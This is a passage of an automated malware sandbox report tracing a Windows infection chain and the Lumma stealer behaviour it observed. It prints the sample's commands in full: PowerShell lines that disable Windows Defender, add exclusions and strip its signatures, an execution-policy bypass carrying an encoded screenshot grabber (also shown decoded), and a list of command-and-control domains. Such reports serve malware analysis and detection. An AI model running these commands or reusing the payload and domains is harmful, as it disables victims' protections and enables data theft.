                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 5_2_00007FF67AEEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF67AEEA684
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEDD37C SetUnhandledExceptionFilter,6_2_00007FF67AEDD37C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEDD19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF67AEDD19C
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEDC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF67AEDC910
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF67AEEA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF67AEEA684
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8633028 IsProcessorFeaturePresent,00007FF8BFB919A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFB919A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF8A8633028
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8A8755A24 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF8A8755A24
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeCode function: 6_2_00007FF8B90E42B0 IsProcessorFeaturePresent,00007FF8BFB919A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFB919A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF8B90E42B0

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Adds a directory exclusion to Windows Defender
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Bypasses PowerShell execution policy
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                Encrypted powershell cmdline option found
                                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                Injects a PE file into a foreign processes
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeMemory written: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe base: 400000 value starts with: 4D5A
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeMemory written: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe base: 400000 value starts with: 4D5A
                                LummaC encrypted strings found
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                                Source: 8ZVMneG.exe, 0000001C.00000002.2640684228.000000000300C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bellflamre.click
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                                Source: d0ef52de9f.exe, 0000005D.00000002.2765729301.0000000000A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                                Modifies Windows Defender protection settings
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Modifies the hosts file
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Removes signatures from Windows Defender
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
